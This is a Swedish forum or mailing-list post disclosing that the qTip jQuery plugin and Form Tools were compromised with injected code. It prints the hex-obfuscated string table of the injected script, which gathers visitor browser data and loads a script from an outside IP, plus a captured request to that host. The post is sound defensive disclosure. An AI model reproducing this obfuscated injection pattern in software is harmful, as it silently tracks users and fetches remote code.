qTip tooltip plugin for the jQuery framework hackat
Stefan Sidén
när jag upptäkte konstiga requests mot en ip-adress jag inte kände
igen. Fanns inget specikt på google om just denna URL, men andra URLer
på samma ip-adress ledde mig till ett wordpress-hack.
http://dan.cx/blog/2011/11/pulling-apart-wordpress-hack
Så använder ni qTip eller andra verktyg från denna utvecklare. Titta
genom er kod.
Snackade med lite folk på irc som tillslut la upp det jag såg på
github
https://github.com/Craga89/qTip2/issues/286
Kort sammanfattning:
I qTip har någon planerat detta:
["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E
\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F
\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C
\x6F\x63\x61\x74\x69\x6F
\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E
\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C
\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A
\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F
\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C
\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C
\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C
\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D
\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
Översatt i mer klartext man man se:
["sc_co", "getElementById", "colorDepth", "width", "height",
"charset", "location", "referrer", "userAgent", "script",
"createElement", "id", "src", "http://91.196.216.64/s.php?ref=",
"&cls=", "&sw=", "&sh=", "&dc=", "&lc=", "&ua=", "head",
"getElementsByTagName", "appendChild"]
Såhär såg anropen ut från en klient:
GET http: //91.196.216.64/s.php?
ref=&cls=32&sw=1280&sh=1024&dc=utf-8&lc=http://example.com/?
p=2&&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT
%206.1%3B%20Trident/4.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B
%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media
%20Center%20PC%206.0%3B%20.NET%20CLR%201.1.4322%29 HTTP/1.1
Accept: */*
Referer: http://example.com/index.php/?p=2&
Accept-Language: sv-SE
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/
4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322)
Accept-Encoding: gzip, deflate
Host: 91.196.216.64
Stefan Sidén
Kan tillägga att även Form Tools är hackat med samma hack. Tex i denna
fil formtools\global\codemirror\js\tokenizejavascript.js
On Dec 8, 4:58 pm, Stefan Sidén <stefan.si...@gmail.com> wrote:
> Idag på jobbet fick jag en leverans av kod, som jag satt och felsökte
> när jag upptäkte konstiga requests mot en ip-adress jag inte kände
> igen. Fanns inget specikt på google om just denna URL, men andra URLer
> på samma ip-adress ledde mig till ett wordpress-hack.http://dan.cx/blog/2011/11/pulling-apart-wordpress-hack
>
> Så använder ni qTip eller andra verktyg från denna utvecklare. Titta
> genom er kod.
>
> Snackade med lite folk på irc som tillslut la upp det jag såg på
> githubhttps://github.com/Craga89/qTip2/issues/286